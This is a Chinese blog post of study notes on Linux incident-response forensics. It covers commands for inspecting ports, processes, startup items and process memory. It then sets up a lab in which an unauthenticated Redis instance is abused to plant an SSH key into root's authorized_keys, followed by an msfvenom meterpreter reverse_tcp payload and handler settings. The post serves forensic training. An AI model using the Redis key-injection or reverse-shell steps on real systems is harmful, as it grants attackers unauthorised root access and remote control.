一些好的文章:

1 SecDarker的文章
http://www.freebuf.com/author/secdarker

2 我的一台linux肉鸡的简单手工***检测过程
http://www.grablan.com/article/2012/920299.html

3 Linux平台“盖茨×××”分析
http://www.freebuf.com/articles/system/117823.html

4 XorDDoS家族最新变种来袭
https://mp.weixin.qq.com/s/VdsLWNJs_AnBBWZrJXqbcw

5 清除linnux Virus
https://blog.csdn.net/u012599988/article/details/53201212

linux应急取证学习(更新中)_第1张图片
1、lsof -i:端口号

2、netstat -tunlp|grep 端口号

都可以查看指定端口被哪个进程占用的情况

linux应急取证学习(更新中)

查看联网进程
linux应急取证学习(更新中)_第2张图片

查看进程打开文件

启动项检查

/etc/init.d

ls -alt

linux应急取证学习(更新中)_第3张图片

查看进程

程序运行时间,程序开始时间,命令行

(1)ps -eFH

(2)配合top使用,看看cpu占用和内存占用情况

(3)查看进程内存字符串

cd /proc/进程号
cat * |strings -n 5 |more

(4)同样在进程目录下

cat maps 可以查看地址空间

linux应急取证学习(更新中)_第4张图片

通过进程内存字符串发现的启动项

查看进程文件

redies漏洞搭建

(1)https://redis.io/download
(2)https://blog.51cto.com/simeon/2115184
(3)http://baijiahao.baidu.com/s?id=1592568628908936396&wfr=spider&for=pc
(4)http://reverse-tcp.xyz/2017/02/09/Redis-Hacking-Tips/

下载redies

 wget http://download.redis.io/releases/redis-3.2.11.tar.gz

linux应急取证学习(更新中)_第5张图片

解压
tar -zxvf redis-3.2.11.tar.gz

进入文件夹中make编译
cd cd redis-3.2.11/
make
之后进入拷贝redis-server,redis-cli到/user/bin中

root@kali:/tmp/redis-3.2.11/src# cp redis-server /usr/bin
root@kali:/tmp/redis-3.2.11/src# cp redis-cli /usr/bin

返回安装包目录,拷贝redis.conf到/etc目录

linux应急取证学习(更新中)

编辑etc目录下的redis.conf文件,
去掉ip绑定,允许除本地外的主机远程登录redis服务

linux应急取证学习(更新中)_第6张图片

关闭保护模式,允许远程连接redis服务
linux应急取证学习(更新中)_第7张图片

复制虚拟机
linux应急取证学习(更新中)_第8张图片

在靶机中创建开启redis服务:redis-server /etc/redis.conf ;
执行mkdir /root/.ssh命令,创建ssh公钥存放目录
(开启ssh,此处不做演示,注意要开启ssh中允许root登陆,修改配置文件)

linux应急取证学习(更新中)_第9张图片
linux应急取证学习(更新中)

在×××机中生成ssh密码对,密码为空
ssh-keygen -t rsa

Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.

linux应急取证学习(更新中)_第10张图片

先把公钥取出来,复制到一个地方,接着复制到下边第三个命令行set x "\n\n\n到\n\n\n"之间。注意空格和换行,我就这折腾了。。。。

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCa5b+1Oq2gdjYeX+L8uQOI56YLznxEAT2IQNxHIkFQwtXG9gSmxygKWSBh+6R6sCxxFSk5OLcPJCR7bfVsCjjIGrixlqC8pRmWxqGXNthX0cIvXEVqEMU/6mdg9LYpvPR6/sQSoZvqiQ4mlEkcxF/Hzi97jk/UBGuYe4Q8kYZhBFgY+s7juljoDnwzXc7Vm1yo6myPaA2kToUTcDtJphiP5puHhaKahI76Uq75HmSuDMhUDgIem3HVkkER5mBvYZOYsW/r0XObzO7IKnD5eQz/DyzxwPawUTPd4v5q5tfdd/qndcdI6h5musrNLMC04gQdUiQs01Vu5Wz7o0bibwjB root@kali\n\n\n"
save
exit

登陆:
ssh -i id_rsa [email protected]
linux应急取证学习(更新中)_第11张图片

端口扫描;
linux应急取证学习(更新中)_第12张图片

linux应急取证学习(更新中)_第13张图片

投放测试×××取证

1 生成virus文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=port -f elf > shell1.elf

linux应急取证学习(更新中)

2 投放载荷

set payload linux/x86/meterpreter/reverse_tcp
show options
set LHOST 10.211.55.3
set LPORT 10001

样本hash:

6dfc7ea279b50b1f962523d517cd76fb
0B3456561B7942AA67403CDDC1FAD2BD